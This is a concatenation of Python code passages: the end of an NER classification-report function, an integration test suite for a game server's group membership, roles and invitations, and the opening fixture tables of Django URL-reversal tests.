        <BLANKLINE>
           micro avg       0.50      0.50      0.50         2
           macro avg       0.50      0.50      0.50         2
        weighted avg       0.50      0.50      0.50         2
        <BLANKLINE>
    """
    check_consistent_length(y_true, y_pred)
    # Fall back to auto-detection when no (valid) scheme class is given.
    if scheme is None or not issubclass(scheme, Token):
        scheme = auto_detect(y_true, suffix)
    # Entities are computed once here and passed down to
    # precision_recall_fscore_support via kwargs to avoid re-parsing.
    entities_true = Entities(y_true, scheme, suffix)
    entities_pred = Entities(y_pred, scheme, suffix)
    target_names = sorted(entities_true.unique_tags | entities_pred.unique_tags)
    if output_dict:
        reporter = DictReporter()
    else:
        # Column width must accommodate the longest class name and the
        # "weighted avg" row label.
        name_width = max(map(len, target_names))
        avg_width = len('weighted avg')
        width = max(name_width, avg_width, digits)
        reporter = StringReporter(width=width, digits=digits)
    # compute per-class scores.
    p, r, f1, s = precision_recall_fscore_support(
        y_true, y_pred,
        average=None,
        sample_weight=sample_weight,
        zero_division=zero_division,
        scheme=scheme,
        suffix=suffix,
        entities_true=entities_true,
        entities_pred=entities_pred
    )
    for row in zip(target_names, p, r, f1, s):
        reporter.write(*row)
    reporter.write_blank()
    # compute average scores.
    average_options = ('micro', 'macro', 'weighted')
    for average in average_options:
        avg_p, avg_r, avg_f1, support = precision_recall_fscore_support(
            y_true, y_pred,
            average=average,
            sample_weight=sample_weight,
            zero_division=zero_division,
            scheme=scheme,
            suffix=suffix,
            entities_true=entities_true,
            entities_pred=entities_pred
        )
        reporter.write('{} avg'.format(average), avg_p, avg_r, avg_f1, support)
    reporter.write_blank()
    return reporter.report()
|
|
from tornado.gen import multi
from tornado.testing import gen_test
from .. server import SocialServer
from .. model.group import GroupFlags, GroupJoinMethod, GroupError, GroupsModel
from .. model.request import NoSuchRequest
from anthill.common import testing
from .. import options as _opts
class GroupsTestCase(testing.ServerTestCase):
    """
    Integration tests for the groups model.

    Covers group creation, the three join methods (FREE, APPROVE, INVITE),
    member roles and permissions, ownership transfer, kicking, concurrent
    profile updates and group name search.

    NOTE: the deprecated ``assertEquals`` alias (removed in Python 3.12)
    has been replaced with ``assertEqual`` throughout.
    """

    GAMESPACE_ID = 1
    # Four distinct test accounts used throughout the suite.
    ACCOUNT_A = 1
    ACCOUNT_B = 2
    ACCOUNT_C = 3
    ACCOUNT_D = 4

    @classmethod
    def need_test_db(cls):
        # These tests exercise the real model layer, so a test DB is required.
        return True

    @classmethod
    def get_server_instance(cls, db=None):
        """Return the server under test, bound to the (test) database."""
        return SocialServer(db)

    @gen_test
    async def test_group_create(self):
        """Creating a group returns a positive group ID."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {})
        self.assertGreater(group_id, 0, "New group ID must be positive")

    @gen_test
    async def test_free_join(self):
        """A FREE group starts with its owner and accepts plain joins."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
        self.assertEqual(len(members), 1, "Group should have one member from scratch")
        self.assertEqual(members[0].account, GroupsTestCase.ACCOUNT_A, "Member should be ACCOUNT_A")
        self.assertEqual(members[0].role, GroupsModel.MAXIMUM_ROLE, "Member role should be max")
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_B, {"test": "b"})
        members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
        members = {
            member.account: member
            for member in members
        }
        self.assertEqual(len(members), 2, "After group join there should be two members")
        self.assertEqual(members[GroupsTestCase.ACCOUNT_A].profile, {"test": "a"})
        self.assertEqual(members[GroupsTestCase.ACCOUNT_B].profile, {"test": "b"})
        self.assertEqual(members[GroupsTestCase.ACCOUNT_B].role, GroupsModel.MINIMUM_ROLE,
                         "Free member role should be min")

    @gen_test
    async def test_same_join(self):
        """Joining a group twice with the same account fails with 409."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {})
        members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
        self.assertEqual(len(members), 1, "Group should have one member from scratch")
        self.assertEqual(members[0].account, GroupsTestCase.ACCOUNT_A, "Member should be ACCOUNT_A")
        with self.assertRaises(GroupError) as e:
            await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                     GroupsTestCase.ACCOUNT_A, {"test": "b"})
        self.assertEqual(e.exception.code, 409)
        # Membership must be unchanged after the rejected join.
        members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
        self.assertEqual(len(members), 1, "Group should have one member from scratch")
        self.assertEqual(members[0].account, GroupsTestCase.ACCOUNT_A, "Member should be ACCOUNT_A")

    @gen_test
    async def test_join_limit(self):
        """Joining past the group's member limit raises GroupError."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 2, GroupsTestCase.ACCOUNT_A, {})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_B, {"test": "a"})
        # A third member exceeds the limit of 2.
        with self.assertRaises(GroupError):
            await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                     GroupsTestCase.ACCOUNT_C, {"test": "b"})

    @gen_test
    async def test_concurrent_group_profile(self):
        """Ten concurrent '++' profile updates must all be applied."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {"value": 1}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        await multi([self.application.groups.update_group(
            GroupsTestCase.GAMESPACE_ID, group_id,
            GroupsTestCase.ACCOUNT_A, {"value": {"@func": "++", "@value": 1}}
        ) for _ in range(0, 10)])
        updated_group = await self.application.groups.get_group(GroupsTestCase.GAMESPACE_ID, group_id)
        # 1 initial + 10 increments.
        self.assertEqual(updated_group.profile, {"value": 11})

    @gen_test
    async def test_concurrent_group_participation_profile(self):
        """Ten concurrent '--' participation updates must all be applied."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"value": 100})
        await multi([self.application.groups.update_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
            {"value": {"@func": "--", "@value": 1}}
        ) for _ in range(0, 10)])
        updated_group_participation = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id,
            GroupsTestCase.ACCOUNT_A)
        # 100 initial - 10 decrements.
        self.assertEqual(updated_group_participation.profile, {"value": 90})

    @gen_test
    async def test_roles(self):
        """A member may lower their own role but never raise it above another's."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_B, {"test": "b"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_C, {"test": "c"})
        # as an owner I should be able to do that
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C,
            1000, [])
        # downgrade own roles
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_C,
            500, [])
        # now try to push them back up
        with self.assertRaises(GroupError):
            await self.application.groups.update_group_participation_permissions(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_C,
                1000, [])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
            200, [])
        # B (role 200) may not touch the owner's role.
        with self.assertRaises(GroupError):
            await self.application.groups.update_group_participation_permissions(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_A,
                100, [])

    @gen_test
    async def test_owner(self):
        """The owner may set their own role/permissions to anything."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
            999999999, [])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
            0, [])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_A,
            5000, ["root"])
        updated_group_participation = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A)
        self.assertEqual(updated_group_participation.permissions, {"root"},
                         "Permissions of account C should be root")
        self.assertEqual(updated_group_participation.role, 5000, "Role should be 5000")

    @gen_test
    async def test_ownership(self):
        """An owner cannot leave until ownership is transferred to a member."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_B, {"test": "b"})
        # The owner cannot simply leave their own group.
        with self.assertRaises(GroupError) as e:
            await self.application.groups.leave_group(GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A)
        self.assertEqual(e.exception.code, 409)
        # Ownership can only be handed to an existing participant.
        with self.assertRaises(GroupError) as e:
            await self.application.groups.transfer_ownership(GroupsTestCase.GAMESPACE_ID, group_id,
                                                             GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C)
        self.assertEqual(e.exception.code, 406)
        await self.application.groups.transfer_ownership(GroupsTestCase.GAMESPACE_ID, group_id,
                                                         GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B)
        # After the transfer the former owner may leave.
        await self.application.groups.leave_group(GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A)

    @gen_test
    async def test_roles_permissions(self):
        """A grantor may only pass on permissions they themselves hold."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_B, {"test": "b"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_C, {"test": "c"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_D, {"test": "d"})
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
            200, ["cat", "dog", "cow"])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_C,
            199, ["cow", "cat", "fox"])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D,
            198, ["cat", "chicken", "pig"])
        # C only receives the intersection with B's permissions.
        updated_group_participation = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C)
        self.assertEqual(updated_group_participation.permissions, {"cat", "cow"},
                         "Permissions of account C should be cat,cow")
        # D only receives the intersection with C's effective permissions.
        updated_group_participation = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D)
        self.assertEqual(updated_group_participation.permissions, {"cat"},
                         "Permissions of account D should be cat")

    @gen_test
    async def test_kick(self):
        """Kicking requires the kick permission and a strictly lower target role."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_B, {"test": "b"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_C, {"test": "c"})
        await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                 GroupsTestCase.ACCOUNT_D, {"test": "d"})
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
            500, [])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C,
            400, [GroupsModel.PERMISSION_KICK])
        await self.application.groups.update_group_participation_permissions(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_D,
            300, [])
        # kick an owner
        with self.assertRaises(GroupError) as e:
            await self.application.groups.kick_from_group(
                GroupsTestCase.GAMESPACE_ID, group_id,
                GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_A)
        self.assertEqual(e.exception.code, 406, "Should be 'You cannot kick an owner'")
        # kick higher role
        with self.assertRaises(GroupError) as e:
            await self.application.groups.kick_from_group(
                GroupsTestCase.GAMESPACE_ID, group_id,
                GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_B)
        self.assertEqual(e.exception.code, 406, "Should be'You cannot kick a player with a higher role'")
        # kick with no permissions to
        with self.assertRaises(GroupError) as e:
            await self.application.groups.kick_from_group(
                GroupsTestCase.GAMESPACE_ID, group_id,
                GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_C)
        self.assertEqual(e.exception.code, 406, "Should be 'You have no permission to kick'")
        # should kick just fine
        await self.application.groups.kick_from_group(
            GroupsTestCase.GAMESPACE_ID, group_id,
            GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D)
        # kick being owner
        await self.application.groups.kick_from_group(
            GroupsTestCase.GAMESPACE_ID, group_id,
            GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C)

    @gen_test
    async def test_approve(self):
        """APPROVE groups require a keyed join request approved by a member."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.APPROVE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        # free join to approve-based group is prohibited
        with self.assertRaises(GroupError) as e:
            await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                     GroupsTestCase.ACCOUNT_B, {"test": "b"})
        self.assertEqual(e.exception.code, 409)
        key_b = await self.application.groups.join_group_request(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, {"bbb": 555})
        key_c = await self.application.groups.join_group_request(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, {"ccc": 666})
        key_d = await self.application.groups.join_group_request(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D, {"ddd": 777})
        await self.application.groups.approve_join_group(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
            900, key_b, ["test"])
        # give account C a permission to approve other requests
        await self.application.groups.approve_join_group(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_C,
            950, key_c, [GroupsModel.PERMISSION_REQUEST_APPROVAL])
        # approve by B who has no such permission
        with self.assertRaises(GroupError) as e:
            await self.application.groups.approve_join_group(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, GroupsTestCase.ACCOUNT_D,
                800, key_d, [])
        self.assertEqual(e.exception.code, 406, "Should be 'You have no permission to approve items'")
        # approve by C but raise the role more than us
        with self.assertRaises(GroupError) as e:
            await self.application.groups.approve_join_group(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D,
                960, key_d, [])
        self.assertEqual(e.exception.code, 409, "Should be 'Approved role cannot be higher than your role'")
        # do the actual approval
        await self.application.groups.approve_join_group(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, GroupsTestCase.ACCOUNT_D,
            940, key_d, [])
        updated_group_participation_b = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B)
        updated_group_participation_c = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C)
        updated_group_participation_d = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D)
        self.assertEqual(updated_group_participation_b.role, 900)
        self.assertEqual(updated_group_participation_b.profile, {"bbb": 555})
        self.assertEqual(updated_group_participation_c.role, 950)
        self.assertEqual(updated_group_participation_c.profile, {"ccc": 666})
        self.assertEqual(updated_group_participation_d.role, 940)
        self.assertEqual(updated_group_participation_d.profile, {"ddd": 777})
        # use same key twice
        with self.assertRaises(NoSuchRequest):
            await self.application.groups.approve_join_group(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A, GroupsTestCase.ACCOUNT_B,
                950, key_b, ["test"])

    @gen_test
    async def test_invite(self):
        """INVITE groups only admit accounts holding a valid invitation key."""
        group_id = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.INVITE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
        # free join to invite-based group is prohibited
        with self.assertRaises(GroupError) as e:
            await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
                                                     GroupsTestCase.ACCOUNT_B, {"test": "b"})
        self.assertEqual(e.exception.code, 409)
        key_b = await self.application.groups.invite_to_group(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A,
            GroupsTestCase.ACCOUNT_B, 500, [])
        key_c = await self.application.groups.invite_to_group(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_A,
            GroupsTestCase.ACCOUNT_C, 600, [GroupsModel.PERMISSION_SEND_INVITE])
        await self.application.groups.accept_group_invitation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B, {"b": True}, key_b)
        await self.application.groups.accept_group_invitation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C, {"c": True}, key_c)
        updated_group_participation_b = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B)
        self.assertEqual(updated_group_participation_b.role, 500)
        self.assertEqual(updated_group_participation_b.profile, {"b": True})
        updated_group_participation_c = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C)
        self.assertEqual(updated_group_participation_c.role, 600)
        self.assertEqual(updated_group_participation_c.profile, {"c": True})
        # B was not granted PERMISSION_SEND_INVITE, so B cannot invite D.
        with self.assertRaises(GroupError) as e:
            await self.application.groups.invite_to_group(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_B,
                GroupsTestCase.ACCOUNT_D, 400, [])
        self.assertEqual(e.exception.code, 406, "Should be 'You have no permission to send invites'")
        key_d = await self.application.groups.invite_to_group(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_C,
            GroupsTestCase.ACCOUNT_D, 400, [])
        # use wrong key
        with self.assertRaises(GroupError) as e:
            await self.application.groups.accept_group_invitation(
                GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D, {"d": False}, key_c)
        self.assertEqual(e.exception.code, 410, "Should be 'No such invite request'")
        await self.application.groups.accept_group_invitation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D, {"d": False}, key_d)
        updated_group_participation_d = await self.application.groups.get_group_participation(
            GroupsTestCase.GAMESPACE_ID, group_id, GroupsTestCase.ACCOUNT_D)
        self.assertEqual(updated_group_participation_d.role, 400)
        self.assertEqual(updated_group_participation_d.profile, {"d": False})

    @gen_test
    async def test_search(self):
        """Group search matches words and prefixes of the group name."""
        group_a = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.INVITE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"},
            group_name="Lorem ipsum dolor sit amet, consectetur adipiscing elit, including same text at the end!")
        group_b = await self.application.groups.create_group(
            GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
            GroupJoinMethod(GroupJoinMethod.INVITE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"},
            group_name="The quick brown fox jumps over the lazy dog, including same text at the end!")
        result_1 = await self.application.groups.search_groups(GroupsTestCase.GAMESPACE_ID, "quick brown fox")
        self.assertEqual(len(result_1), 1)
        self.assertEqual(result_1[0].group_id, group_b)
        result_2 = await self.application.groups.search_groups(GroupsTestCase.GAMESPACE_ID, "Lor")
        self.assertEqual(len(result_2), 1)
        self.assertEqual(result_2[0].group_id, group_a)
        # A phrase shared by both names matches both groups.
        result_3 = await self.application.groups.search_groups(GroupsTestCase.GAMESPACE_ID, "including same text")
        self.assertEqual(len(result_3), 2)
|
|
"""
Unit tests for reverse URL lookups.
"""
from __future__ import unicode_literals
import unittest
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.core.urlresolvers import (reverse, resolve, get_callable,
get_resolver, NoReverseMatch, Resolver404, ResolverMatch, RegexURLResolver,
RegexURLPattern)
from django.http import HttpRequest, HttpResponseRedirect, HttpResponsePermanentRedirect
from django.shortcuts import redirect
from django.test import TestCase
from django.utils import six
from . import urlconf_outer, middleware, views
# Fixture table consumed by the resolve() tests: each row is matched against
# the result of django.core.urlresolvers.resolve() for the given path.
resolve_test_data = (
    # These entries are in the format: (path, url_name, app_name, namespace, view_func, args, kwargs)
    # Simple case
    ('/normal/42/37/', 'normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/view_class/42/37/', 'view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/included/normal/42/37/', 'inc-normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/included/view_class/42/37/', 'inc-view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
    # Unnamed args are dropped if you have *any* kwargs in a pattern
    ('/mixed_args/42/37/', 'mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
    ('/included/mixed_args/42/37/', 'inc-mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
    # Unnamed views will be resolved to the function/class name
    ('/unnamed/normal/42/37/', 'urlpatterns_reverse.views.empty_view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/unnamed/view_class/42/37/', 'urlpatterns_reverse.views.ViewClass', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
    # If you have no kwargs, you get an args list.
    ('/no_kwargs/42/37/', 'no-kwargs', None, '', views.empty_view, ('42','37'), {}),
    ('/included/no_kwargs/42/37/', 'inc-no-kwargs', None, '', views.empty_view, ('42','37'), {}),
    # Namespaces
    ('/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/ns-included1/normal/42/37/', 'inc-normal-view', None, 'inc-ns1', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    # Nested namespaces
    ('/ns-included1/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    ('/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:inc-ns4:inc-ns2:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
    # Namespaces capturing variables
    ('/inc70/', 'inner-nothing', None, 'inc-ns5', views.empty_view, tuple(), {'outer': '70'}),
    ('/inc78/extra/foobar/', 'inner-extra', None, 'inc-ns5', views.empty_view, tuple(), {'outer':'78', 'extra':'foobar'}),
)
# Fixture table for the reverse() tests. Each row is:
#   (view name, expected URL — or NoReverseMatch if reversing must fail,
#    positional args, keyword args)
test_data = (
    ('places', '/places/3/', [3], {}),
    ('places', '/places/3/', ['3'], {}),
    ('places', NoReverseMatch, ['a'], {}),
    ('places', NoReverseMatch, [], {}),
    ('places?', '/place/', [], {}),
    ('places+', '/places/', [], {}),
    ('places*', '/place/', [], {}),
    ('places2?', '/', [], {}),
    ('places2+', '/places/', [], {}),
    ('places2*', '/', [], {}),
    ('places3', '/places/4/', [4], {}),
    ('places3', '/places/harlem/', ['harlem'], {}),
    ('places3', NoReverseMatch, ['harlem64'], {}),
    ('places4', '/places/3/', [], {'id': 3}),
    ('people', NoReverseMatch, [], {}),
    ('people', '/people/adrian/', ['adrian'], {}),
    ('people', '/people/adrian/', [], {'name': 'adrian'}),
    ('people', NoReverseMatch, ['name with spaces'], {}),
    ('people', NoReverseMatch, [], {'name': 'name with spaces'}),
    ('people2', '/people/name/', [], {}),
    ('people2a', '/people/name/fred/', ['fred'], {}),
    ('people_backref', '/people/nate-nate/', ['nate'], {}),
    ('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
    ('optional', '/optional/fred/', [], {'name': 'fred'}),
    ('optional', '/optional/fred/', ['fred'], {}),
    ('hardcoded', '/hardcoded/', [], {}),
    ('hardcoded2', '/hardcoded/doc.pdf', [], {}),
    ('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
    ('people3', NoReverseMatch, [], {'state': 'il'}),
    ('people3', NoReverseMatch, [], {'name': 'adrian'}),
    ('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
    ('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
    ('people6', '/people//adrian/', ['adrian'], {}),
    ('range', '/character_set/a/', [], {}),
    ('range2', '/character_set/x/', [], {}),
    ('price', '/price/$10/', ['10'], {}),
    ('price2', '/price/$10/', ['10'], {}),
    ('price3', '/price/$10/', ['10'], {}),
    ('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
    ('headlines', '/headlines/2007.5.21/', [], dict(year=2007, month=5, day=21)),
    # Special characters must come back percent-encoded.
    ('windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [], dict(drive_name='C', path=r'Documents and Settings\spam')),
    ('special', r'/special_chars/%2B%5C%24%2A/', [r'+\$*'], {}),
    ('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
    ('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
    ('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
    ('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
    ('special', NoReverseMatch, [''], {}),
    ('mixed', '/john/0/', [], {'name': 'john'}),
    ('repeats', '/repeats/a/', [], {}),
    ('repeats2', '/repeats/aa/', [], {}),
    ('repeats3', '/repeats/aa/', [], {}),
